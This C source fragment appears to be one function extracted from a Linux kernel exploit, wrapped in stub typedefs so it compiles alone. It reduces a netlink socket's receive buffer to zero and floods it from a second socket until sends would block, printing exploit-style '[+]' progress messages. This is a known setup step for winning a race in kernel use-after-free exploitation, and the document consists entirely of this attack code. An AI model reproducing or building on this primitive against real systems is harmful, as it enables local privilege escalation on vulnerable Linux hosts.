
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_nl {int nl_groups; int nl_pid; int nl_pad; int nl_family; } ;
struct sock_pid {int sock_fd; int pid; } ;
struct msghdr {int msg_namelen; int msg_iovlen; int msg_flags; int msg_controllen; int * msg_control; struct iovec* msg_iov; struct sockaddr_nl* msg_name; } ;
struct iovec {char* iov_base; int iov_len; } ;
typedef int new_size ;
typedef int buf ;
typedef int addr ;


 int AF_NETLINK ;
 scalar_t__ EAGAIN ;
 int MSG_DONTWAIT ;
 int SOL_SOCKET ;
 int SO_RCVBUF ;
 scalar_t__ _sendmsg (int ,struct msghdr*,int ) ;
 scalar_t__ _setsockopt (int ,int ,int ,int*,int) ;
 scalar_t__ errno ;
 int perror (char*) ;
 int printf (char*) ;

__attribute__((used)) static int fill_receive_buffer(struct sock_pid *target, struct sock_pid *guard)
{
  char buf[1024*10];
  int new_size = 0;

  struct sockaddr_nl addr = {
    .nl_family = AF_NETLINK,
    .nl_pad = 0,
    .nl_pid = target->pid,
    .nl_groups = 0
  };

  struct iovec iov = {
    .iov_base = buf,
    .iov_len = sizeof(buf)
  };

  struct msghdr mhdr = {
    .msg_name = &addr,
    .msg_namelen = sizeof(addr),
    .msg_iov = &iov,
    .msg_iovlen = 1,
    .msg_control = ((void*)0),
    .msg_controllen = 0,
    .msg_flags = 0,
  };

  printf("[ ] preparing blocking netlink socket\n");

  if (_setsockopt(target->sock_fd, SOL_SOCKET, SO_RCVBUF, &new_size, sizeof(new_size)))
    perror("[-] setsockopt");
  else
    printf("[+] receive buffer reduced\n");

  printf("[ ] flooding socket\n");
  while (_sendmsg(guard->sock_fd, &mhdr, MSG_DONTWAIT) > 0)
    ;
  if (errno != EAGAIN)
  {
    perror("[-] sendmsg");
    goto fail;
  }
  printf("[+] flood completed\n");

  printf("[+] blocking socket ready\n");

  return 0;

fail:
  printf("[-] failed to prepare blocking socket\n");
  return -1;
}
